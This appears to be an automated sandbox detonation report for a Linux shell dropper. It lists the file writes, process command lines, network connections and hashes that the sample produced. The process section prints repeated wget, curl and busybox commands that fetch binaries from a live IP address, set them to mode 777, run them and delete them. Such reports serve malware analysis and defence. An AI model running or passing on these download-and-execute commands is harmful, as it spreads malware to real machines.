| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
Processes
/tmp/01b083f3a3bfa8feee984c83cb4f33526298df0f0e7fd2d1b339114c80ce0ca9.sh
[/tmp/01b083f3a3bfa8feee984c83cb4f33526298df0f0e7fd2d1b339114c80ce0ca9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/wget
[wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 02:02
Reported
2024-11-21 02:04
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
29s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
